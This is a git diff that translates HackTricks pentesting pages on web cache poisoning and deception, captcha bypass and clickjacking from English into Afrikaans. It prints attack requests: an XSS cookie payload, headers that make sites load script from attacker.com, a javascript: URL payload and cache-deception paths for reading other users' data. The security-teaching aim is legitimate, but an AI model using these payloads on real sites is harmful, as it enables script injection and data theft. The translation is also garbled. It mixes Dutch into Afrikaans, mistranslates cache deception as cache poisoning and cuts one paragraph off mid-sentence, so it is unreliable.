 Cookie: session=VftzO7ZtiBj5zNLRAuFpXpSQLjS4lBmU; fehost=asd"%2balert(1)%2b"
 ```
+Let daarop dat as die kwesbare koekie baie deur die gebruikers gebruik word, sal gereelde versoekskakeling die cache skoonmaak.
 
-Note that if the vulnerable cookie is very used by the users, regular requests will be cleaning the cache.
-
-### Using multiple headers to exploit web cache poisoning vulnerabilities 
-
-Sometimes you will need to **exploit several unkeyed inputs** to be able to abuse a cache. For example, you may find an **Open redirect** if you set `X-Forwarded-Host` to a domain controlled by you and `X-Forwarded-Scheme` to `http`.**If** the **server** is **forwarding** all the **HTTP** requests **to HTTPS** and using the header `X-Forwarded-Scheme` as the domain name for the redirect. You can control where the page is pointed by the redirect.
+### Gebruik van verskeie koptekste om webkaskadevergiftigingskwesbaarhede uit te buit 
 
+Soms sal jy verskeie ongekenmerkte insette moet uitbuit om 'n kaskade te misbruik. Byvoorbeeld, jy kan 'n **Oop omleiding** vind as jy `X-Forwarded-Host` instel op 'n deur jou beheerde domein en `X-Forwarded-Scheme` op `http`. **As** die **bediener** al die **HTTP**-versoeke **na HTTPS stuur** en die koptekser `X-Forwarded-Scheme` gebruik as die domeinnaam vir die omleiding. Jy kan beheer waarheen die bladsy verwys word deur die omleiding.
 ```markup
 GET /resources/js/tracking.js HTTP/1.1
 Host: acc11fe01f16f89c80556c2b0056002e.web-security-academy.net
 X-Forwarded-Host: ac8e1f8f1fb1f8cb80586c1d01d500d3.web-security-academy.net/
 X-Forwarded-Scheme: http
 ```
+### Uitbuiting met beperkte `Vary`-header
 
-### Exploiting with limited `Vary`header
-
-If you found that the **`X-Host`** header is being used as **domain name to load a JS resource** but the **`Vary`** header in the response is indicating **`User-Agent`**. Then, you need to find a way to exfiltrate the User-Agent of the victim and poison the cache using that user agent:
-
+As jy vind dat die **`X-Host`**-header gebruik word as **domeinnaam om 'n JS-hulpbron te laai**, maar die **`Vary`**-header in die respons dui op **`User-Agent`**, moet jy 'n manier vind om die User-Agent van die slagoffer uit te voer en die cache te vergiftig deur daardie gebruikersagent te gebruik:
 ```markup
 GET / HTTP/1.1
 Host: vulnerbale.net
 User-Agent: THE SPECIAL USER-AGENT OF THE VICTIM
 X-Host: attacker.com
 ```
+### Uitbuiting van HTTP-cachevergiftiging door misbruik van HTTP Request Smuggling
 
-### Exploiting HTTP Cache Poisoning by abusing HTTP Request Smuggling
+Leer hier hoe je [Cachevergiftigingsaanvallen kunt uitvoeren door misbruik te maken van HTTP Request Smuggling](http-request-smuggling/#using-http-request-smuggling-to-perform-web-cache-poisoning).
 
-Learn here about how to perform [Cache Poisoning attacks by abusing HTTP Request Smuggling](http-request-smuggling/#using-http-request-smuggling-to-perform-web-cache-poisoning).
+### Geautomatiseerde testen voor Web Cache-vergiftiging
 
-### Automated testing for Web Cache Poisoning
+De [Web Cache Vulnerability Scanner](https://github.com/Hackmanit/Web-Cache-Vulnerability-Scanner) kan worden gebruikt om automatisch te testen op web cache-vergiftiging. Het ondersteunt veel verschillende technieken en is zeer aanpasbaar.
 
-The [Web Cache Vulnerability Scanner](https://github.com/Hackmanit/Web-Cache-Vulnerability-Scanner) can be used to automatically test for web cache poisoning. It supports many different techniques and is highly customizable.
-
-Example usage: `wcvs -u example.com`
+Voorbeeldgebruik: `wcvs -u example.com`
 
 

 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
+Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om eenvoudig workflows te bouwen en te automatiseren met behulp van 's werelds meest geavanceerde communitytools.\
+Krijg vandaag nog toegang:
 
 {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
 
-## Vulnerable Examples
+## Kwetsbare voorbeelden
 
 ### Apache Traffic Server ([CVE-2021-27577](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27577))
 
-ATS forwarded the fragment inside the URL without stripping it and generated the cache key only using the host, path and query (ignoring the fragment). So the request `/#/../?r=javascript:alert(1)` was sent to the backend as `/#/../?r=javascript:alert(1)` and the cache key didn't have the payload inside of it, only host, path and query.
+ATS stuurde het fragment in de URL door zonder het te verwijderen en genereerde de cache-sleutel alleen met behulp van de host, het pad en de query (waarbij het fragment werd genegeerd). Dus het verzoek `/#/../?r=javascript:alert(1)` werd naar de backend gestuurd als `/#/../?r=javascript:alert(1)` en de cache-sleutel bevatte de payload niet, alleen de host, het pad en de query.
 
 ### GitHub CP-DoS
 
-Sending a bad value in the content-type header triggered a 405 cached response. The cache key contained the cookie so it was possible only to attack unauth users.
+Het verzenden van een verkeerde waarde in de content-type header activeerde een 405 gecachte respons. De cache-sleutel bevatte de cookie, dus het was alleen mogelijk om niet-geauthenticeerde gebruikers aan te vallen.
 
 ### GitLab + GCP CP-DoS
 
-GitLab uses GCP buckets to store static content. **GCP Buckets** support the **header `x-http-method-override`**. So it was possible to send the header `x-http-method-override: HEAD` and poison the cache into returning an empty response body. It could also support the method `PURGE`.
+GitLab gebruikt GCP-buckets om statische inhoud op te slaan. **GCP Buckets** ondersteunen de **header `x-http-method-override`**. Het was dus mogelijk om de header `x-http-method-override: HEAD` te verzenden en de cache te vergiftigen zodat een lege responsbody werd geretourneerd. Het kon ook de methode `PURGE` ondersteunen.
 
 ### Rack Middleware (Ruby on Rails)
 
-In Ruby on Rails applications, Rack middleware is often utilized. The purpose of the Rack code is to take the value of the **`x-forwarded-scheme`** header and set it as the request's scheme. When the header `x-forwarded-scheme: http` is sent, a 301 redirect to the same location occurs, potentially causing a Denial of Service (DoS) to that resource. Additionally, the application might acknowledge the `X-forwarded-host` header and redirect users to the specified host. This behavior can lead to the loading of JavaScript files from an attacker's server, posing a security risk.
+In Ruby on Rails-toepassingen wordt vaak gebruik gemaakt van Rack-middleware. Het doel van de Rack-code is om de waarde van de **`x-forwarded-scheme`** header te nemen en deze als het schema van het verzoek in te stellen. Wanneer de header `x-forwarded-scheme: http` wordt verzonden, vindt er een 301-omleiding naar dezelfde locatie plaats, wat mogelijk kan leiden tot een Denial of Service (DoS) voor die bron. Bovendien kan de applicatie de `X-forwarded-host` header herkennen en gebruikers doorverwijzen naar de opgegeven host. Dit gedrag kan leiden tot het laden van JavaScript-bestanden vanaf de server van een aanvaller, wat een beveiligingsrisico vormt.
 
-### 403 and Storage Buckets
+### 403 en Storage Buckets
 
-Cloudflare previously cached 403 responses. Attempting to access S3 or Azure Storage Blobs with incorrect Authorization headers would result in a 403 response that got cached. Although Cloudflare has stopped caching 403 responses, this behavior might still be present in other proxy services.
+Cloudflare heeft eerder 403-responses in de cache opgeslagen. Als er werd geprobeerd om toegang te krijgen tot S3- of Azure Storage Blobs met onjuiste Autorisatie-headers, resulteerde dit in een 403-respons die werd gecachet. Hoewel Cloudflare is gestopt met het cachen van 403-responses, kan dit gedrag nog steeds aanwezig zijn in andere proxy-services.
 
-### Injecting Keyed Parameters
+### Injecteren van gesleutelde parameters
 
-Caches often include specific GET parameters in the cache key. For instance, Fastly's Varnish cached the `size` parameter in requests. However, if a URL-encoded version of the parameter (e.g., `siz%65`) was also sent with an erroneous value, the cache key would be constructed using the correct `size` parameter. Yet, the backend would process the value in the URL-encoded parameter. URL-encoding the second `size` parameter led to its omission by the cache but its utilization by the backend. Assigning a value of 0 to this parameter resulted in a cacheable 400 Bad Request error.
+Caches bevatten vaak specifieke GET-parameters in de cache-sleutel. Bijvoorbeeld, Fastly's Varnish cachte de `size` parameter in verzoeken. Als echter een URL-gecodeerde versie van de parameter (bijv. `siz%65`) ook werd verzonden met een onjuiste waarde, zou de cache-sleutel worden geconstrueerd met behulp van de juiste `size` parameter. Maar de backend zou de waarde verwerken in de URL-gecodeerde parameter. Het URL-coderen van de tweede `size` parameter leidde ertoe dat deze door de cache werd weggelaten maar door de backend werd gebruikt. Het toewijzen van een waarde van 0 aan deze parameter resulteerde in een cachebare 400 Bad Request-fout.
 
-### User Agent Rules
+### User Agent-regels
 
-Some developers block requests with user-agents matching those of high-traffic tools like FFUF or Nuclei to manage server load. Ironically, this approach can introduce vulnerabilities such as cache poisoning and DoS.
+Sommige ontwikkelaars blokkeren verzoeken met user-agents die overeenkomen met die van veelgebruikte tools zoals FFUF of Nuclei om de serverbelasting te beheren. Ironisch genoeg kan deze aanpak kwetsbaarheden introduceren zoals cachevergiftiging en DoS.
 
-### Illegal Header Fields
+### Onwettige header-velden
 
-The [RFC7230](https://datatracker.ietf.mrg/doc/html/rfc7230) specifies the acceptable characters in header names. Headers containing characters outside of the specified **tchar** range should ideally trigger a 400 Bad Request response. In practice, servers don't always adhere to this standard. A notable example is Akamai, which forwards headers with invalid characters and caches any 400 error, as long as the `cache-control` header is not present. An exploitable pattern was identified where sending a header with an illegal character, such as `\`, would result in a cacheable 400 Bad Request error.
+De [RFC7230](https://datatracker.ietf.mrg/doc/html/rfc7230) specificeert de acceptabele tekens in kopernamen. Headers die tekens bevatten buiten het gespecificeerde **tchar**-bereik zouden idealiter een 400 Bad Request-respons moeten activeren. In de praktijk houden servers zich echter niet altijd aan deze standaard. Een opmerkelijk voorbeeld hiervan is Akamai, dat headers met ongeldige tekens doorstuurt en elke 400-fout in de cache plaatst, zolang de `cache-control` header niet aanwezig is. Er werd een uitbuitbaar patroon geïdentificeerd waarbij het verzenden van een header met een ongeldig teken, zoals `\`, zou resulteren in een cachebare 400 Bad Request-fout.
 
-### Finding new headers
+### Het vinden van nieuwe headers
 
 [https://gist.github.com/iustin24/92a5ba76ee436c85716f003dda8eecc6](https://gist.github.com/iustin24/92a5ba76ee436c85716f003dda8eecc6)
 
-## Cache Deception
+## Cachevergiftiging
 
-The goal of Cache Deception is to make clients **load resources that are going to be saved by the cache with their sensitive information**.
+Het doel van Cachevergiftiging is om clients **bronnen te laten laden die worden opgeslagen door de cache met hun gevoelige informatie**.
 
-First of all note that **extensions** such as `.css`, `.js`, `.png` etc are usually **configured** to be **saved** in the **cache.** Therefore, if you access `www.example.com/profile.php/nonexistent.js` the cache will probably store the response because it sees the `.js` **extension**. But, if the **application** is **replaying** with the **sensitive** user contents stored in _www.example.com/profile.php_, you can **steal** those contents from other users.
+Allereerst moet worden opgemerkt dat **extensies** zoals `.css`, `.js`, `.png`, enz. meestal zijn **geconfigureerd** om te worden **opgeslagen** in de **cache**. Daarom, als je toegang krijgt tot `www.example.com/profile.php/nonexistent.js`, zal de cache waarschijnlijk de respons opslaan omdat het de extensie `.js` ziet. Maar als de **applicatie** de **gevoelige** gebruikersinhoud die is opgeslagen in _www.example.com/profile.php_ herhaalt, kun je die inhoud stelen van andere gebruikers.
 
-Other things to test:
+Andere dingen om te testen:
 
 * _www.example.com/profile.php/.js_
 * _www.example.com/profile.php/.css_
 * _www.example.com/profile.php/test.js_
 * _www.example.com/profile.php/../test.js_
 * _www.example.com/profile.php/%2e%2e/test.js_
-* _Use lesser known extensions such as_ `.avif`
+* _Gebruik minder bekende extensies zoals_ `.avif`
 
-Another very clear example can be found in this write-up: [https://hackerone.com/reports/593712](https://hackerone.com/reports/593712).\
-In the example, it is explained that if you load a non-existent page like _http://www.example.com/home.php/non-existent.css_ the content of _http://www.example.com/home.php_ (**with the user's sensitive information**) is going to be returned and the cache server is going to save the result.\
-Then, the **attacker** can access _http://www.example.com/home.php/non-existent.css_ in their own browser and observe the **confidential information** of the users that accessed before.
+Een ander zeer duidelijk voorbeeld is te vinden in deze write-up: [https://hackerone.com/reports/593712](https://hackerone.com/reports/593712).\
+In het voorbeeld wordt uitgelegd dat als je een niet-bestaande pagina laadt zoals _http://www.example.com/home.php/non-existent.css_, de inhoud van _http://www.example.com/home.php_ (**met de gevoelige informatie van de gebruikers**) zal worden geretourneerd en de cache-server zal het resultaat opslaan.\
+Vervolgens kan de **aanvaller** toegang krijgen tot _http://www.example.com/home.php/non-existent.css_ in hun eigen browser en de **vertrouwelijke informatie** van de gebruikers die eerder toegang hebben gekregen, observeren.
 
-Note that the **cache proxy** should be **configured** to **cache** files **based** on the **extension** of the file (_.css_) and not base on the content-type. In the example _http://www.example.com/home.php/non-existent.css_ will have a `text/html` content-type instead of a `text/css` mime type (which is the expected for a _.css_ file).
+Let op dat de **cache-proxy** moet worden **geconfigureerd** om bestanden **te cachen** op basis van de **extensie** van het bestand (_.css_) en niet op basis van het content-type. In het voor
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Learn here about how to perform[ Cache Deceptions attacks abusing HTTP Request Smuggling](http-request-smuggling/#using-http-request-smuggling-to-perform-web-cache-deception).
+Ander maniere om HackTricks te ondersteun:
 
-## References
-
-* [https://portswigger.net/web-security/web-cache-poisoning](https://portswigger.net/web-security/web-cache-poisoning)
-* [https://portswigger.net/web-security/web-cache-poisoning/exploiting#using-web-cache-poisoning-to-exploit-cookie-handling-vulnerabilities](https://portswigger.net/web-security/web-cache-poisoning/exploiting#using-web-cache-poisoning-to-exploit-cookie-handling-vulnerabilities)
-* [https://hackerone.com/reports/593712](https://hackerone.com/reports/593712)
-* [https://youst.in/posts/cache-poisoning-at-scale/](https://youst.in/posts/cache-poisoning-at-scale/)
-* [https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9](https://bxmbn.medium.com/how-i-test-for-web-cache-vulnerabilities-tips-and-tricks-9b138da08ff9)
-* [https://www.linkedin.com/pulse/how-i-hacked-all-zendesk-sites-265000-site-one-line-abdalhfaz/](https://www.linkedin.com/pulse/how-i-hacked-all-zendesk-sites-265000-site-one-line-abdalhfaz/)
-
-

-
-\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
-
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
-
-

-
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
-
-Other ways to support HackTricks:
-
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
diff --git a/pentesting-web/captcha-bypass.md b/pentesting-web/captcha-bypass.md
index 831f168fe..284268a89 100644
--- a/pentesting-web/captcha-bypass.md
+++ b/pentesting-web/captcha-bypass.md
@@ -1,67 +1,67 @@
-# Captcha Bypass
+# Captcha Omspring
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
 
 

 
-## Captcha Bypass
+## Captcha Omspring
 
-To **bypass** the captcha during **server testing** and automate user input functions, various techniques can be employed. The objective is not to undermine security but to streamline the testing process. Here's a comprehensive list of strategies:
+Om die captcha tydens bedienertoetsing te **omspring** en gebruikersinvoerfunksies outomaties te maak, kan verskeie tegnieke gebruik word. Die doel is nie om sekuriteit te ondermyn nie, maar om die toetsproses te stroomlyn. Hier is 'n omvattende lys van strategieë:
 
-1. **Parameter Manipulation**:
-   * **Omit the Captcha Parameter**: Avoid sending the captcha parameter. Experiment with changing the HTTP method from POST to GET or other verbs, and altering the data format, such as switching between form data and JSON.
-   * **Send Empty Captcha**: Submit the request with the captcha parameter present but left empty.
+1. **Parametermanipulasie**:
+* **Laat die Captcha-parameter weg**: Vermy om die captcha-parameter te stuur. Eksperimenteer met die verandering van die HTTP-metode van POST na GET of ander werkwoorde, en verander die dataformaat, soos oorskakel tussen vormdata en JSON.
+* **Stuur 'n leë Captcha**: Stuur die versoek met die captcha-parameter teenwoordig, maar leeg gelaat.
 
-2. **Value Extraction and Reuse**:
-   * **Source Code Inspection**: Search for the captcha value within the page's source code.
-   * **Cookie Analysis**: Examine the cookies to find if the captcha value is stored and reused.
-   * **Reuse Old Captcha Values**: Attempt to use previously successful captcha values again.
-   * **Session Manipulation**: Try using the same captcha value across different sessions or the same session ID.
+2. **Waarde-ekstraksie en hergebruik**:
+* **Bronkode-inspeksie**: Soek na die captcha-waarde binne die bronkode van die bladsy.
+* **Koekie-analise**: Ondersoek die koekies om te bepaal of die captcha-waarde gestoor en hergebruik word.
+* **Hergebruik ou Captcha-waardes**: Probeer om voorheen suksesvolle captcha-waardes weer te gebruik.
+* **Sessie-manipulasie**: Probeer om dieselfde captcha-waarde oor verskillende sessies of dieselfde sessie-ID te gebruik.
 
-3. **Automation and Recognition**:
-   * **Mathematical Captchas**: If the captcha involves math operations, automate the calculation process.
-   * **Image Recognition**:
-     * For captchas that require reading characters from an image, manually or programmatically determine the total number of unique images. If the set is limited, you might identify each image by its MD5 hash.
-     * Utilize Optical Character Recognition (OCR) tools like [Tesseract OCR](https://github.com/tesseract-ocr/tesseract) to automate character reading from images.
+3. **Outomatisering en herkenning**:
+* **Wiskundige Captchas**: As die captcha wiskundige bewerkings behels, outomatiseer die berekeningsproses.
+* **Beeldherkenning**:
+* Vir captchas wat vereis dat karakters van 'n beeld gelees word, bepaal die totale aantal unieke beelde handmatig of programmaties. As die stel beperk is, kan jy elke beeld identifiseer aan die hand van sy MD5-hash.
+* Gebruik optiese karakterherkenning (OCR)-hulpmiddels soos [Tesseract OCR](https://github.com/tesseract-ocr/tesseract) om karakters outomaties van beelde te lees.
 
-4. **Additional Techniques**:
-   * **Rate Limit Testing**: Check if the application limits the number of attempts or submissions in a given timeframe and whether this limit can be bypassed or reset.
-   * **Third-party Services**: Employ captcha-solving services or APIs that offer automated captcha recognition and solving.
-   * **Session and IP Rotation**: Frequently change session IDs and IP addresses to avoid detection and blocking by the server.
-   * **User-Agent and Header Manipulation**: Alter the User-Agent and other request headers to mimic different browsers or devices.
-   * **Audio Captcha Analysis**: If an audio captcha option is available, use speech-to-text services to interpret and solve the captcha.
+4. **Addisionele Tegnieke**:
+* **Tarieflimiettoetsing**: Kyk of die toepassing die aantal pogings of indienings binne 'n gegewe tydperk beperk en of hierdie limiet omseil of herstel kan word.
+* **Derdeparty-dienste**: Maak gebruik van captcha-oplossingsdienste of API's wat outomatiese captcha-herkenning en -oplossing bied.
+* **Sessie- en IP-rotasie**: Verander gereeld sessie-IDs en IP-adresse om opsporing en blokkering deur die bediener te voorkom.
+* **Gebruikersagent- en kopmanipulasie**: Verander die Gebruikersagent en ander versoekkoppe om verskillende webblaaier of toestelle na te boots.
+* **Audio Captcha-analise**: As 'n klankcaptcha-opsie beskikbaar is, gebruik spraak-na-tekshulpmiddels om die captcha te interpreteer en op te los.
 
 
-## Online Services to bypass captchas
+## Aanlyn Dienste om captchas te omspring
 
 ### [Capsolver](https://www.capsolver.com/)
 
-Capsolver‘s automatic captcha solver offers the **most affordable and quick captcha-solving solution**. You may rapidly combine it with your program using its simple integration option to achieve the best results in a matter of seconds.
+Capsolver se outomatiese captcha-oplosser bied die **mees bekostigbare en vinnige oplossing vir captchas**. Jy kan dit vinnig saamvoeg met jou program deur middel van die eenvoudige integrasie-opsie om die beste resultate binne sekondes te behaal.
 
-With a success rate of 99.15%, Capsolver can **answer more than 10M captchas every minute**. This implies that your automation or scrape will have a 99.99% uptime. You may buy a captcha package if you have a large budget.
+Met 'n sukseskoers van 99.15% kan Capsolver **meer as 10M captchas elke minuut oplos**. Dit beteken dat jou outomatisering of skraping 'n 99.99% beskikbaarheid sal hê. As jy 'n groot begroting het, kan jy 'n captcha-pakket koop.
 
-At the lowest price on the market, you may receive a variety of solutions, including reCAPTCHA V2, reCAPTCHA V3, hCaptcha, hCaptcha Click, reCaptcha click, Funcaptcha Click, FunCaptcha, datadome captcha, aws captcha, picture-to-text, binance / coinmarketcap captcha, geetest v3 / v3, and more. With this service, **0.1s is the slowest speed ever measured**.
+Teen die laagste prys op die mark kan jy 'n verskeidenheid oplossings ontvang, insluitend reCAPTCHA V2, reCAPTCHA V3, hCaptcha, hCaptcha Click, reCaptcha click, Funcaptcha Click, FunCaptcha, datadome captcha, aws captcha, prentjie-na-tekst, binance / coinmarketcap captcha, geetest v3 / v3, en meer. Met hierdie diens is **0.1s die stadigste spoed wat ooit gemeet is**.
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
 
 

diff --git a/pentesting-web/clickjacking.md b/pentesting-web/clickjacking.md
index 4453801de..22461274c 100644
--- a/pentesting-web/clickjacking.md
+++ b/pentesting-web/clickjacking.md
@@ -2,89 +2,184 @@
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
 
 

 
 

 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
+Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en **outomatiese werksvloeie** te bou met behulp van die wêreld se **mees gevorderde** gemeenskapsinstrumente.\
+Kry vandag toegang:
 
 {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
 
-## What is Clickjacking
+## Wat is Clickjacking
 
-In a clickjacking attack, a **user** is **tricked** into **clicking** an **element** on a webpage that is either **invisible** or disguised as a different element. This manipulation can lead to unintended consequences for the user, such as the downloading of malware, redirection to malicious web pages, provision of credentials or sensitive information, money transfers, or the online purchasing of products.
+In 'n clickjacking-aanval word 'n **gebruiker** **bedrieg** om op 'n **element** op 'n webblad te **klik** wat óf **onsigbaar** is óf vermom is as 'n ander element. Hierdie manipulasie kan onbedoelde gevolge vir die gebruiker hê, soos die aflaai van kwaadwillige sagteware, omleiding na skadelike webbladsye, die voorsiening van geloofsbriewe of sensitiewe inligting, geldoordragte, of die aanlyn-aankoop van produkte.
 
 
-### Prepopulate forms trick
+### Trick om vorms vooraf te vul
 
-Sometimes is possible to **fill the value of fields of a form using GET parameters when loading a page**. An attacker may abuse this behaviour to fill a form with arbitrary data and send the clickjacking payload so the user press the button Submit.
+Dit is soms moontlik om die waarde van velds in 'n vorm te **vul deur GET-parameters te gebruik wanneer 'n bladsy gelaai word**. 'n Aanvaller kan hierdie gedrag misbruik om 'n vorm met willekeurige data te vul en die clickjacking-lading te stuur sodat die gebruiker die knoppie Indien druk.
 
-### Populate form with Drag\&Drop
+### Vul vorm met Sleep\&Laat val
 
-If you need the user to **fill a form** but you don't want to directly ask him to write some specific information (like the email and or specific password that you know), you can just ask him to **Drag\&Drop** something that will write your controlled data like in [**this example**](https://lutfumertceylan.com.tr/posts/clickjacking-acc-takeover-drag-drop/).
-
-### Basic Payload
+As jy wil hê dat die gebruiker 'n vorm moet **vul**, maar jy wil hom nie direk vra om spesifieke inligting te skryf (soos die e-pos en/of 'n spesifieke wagwoord wat jy weet nie), kan jy hom net vra om iets te **Sleep\&Laat val** wat jou beheerde data sal skryf, soos in [**hierdie voorbeeld**](https://lutfumertceylan.com.tr/posts/clickjacking-acc-takeover-drag-drop/).
 
+### Basiese Lading
 ```markup
 
 
Click me

 
 ```
+### Veelstapgelaai
 
-### Multistep Payload
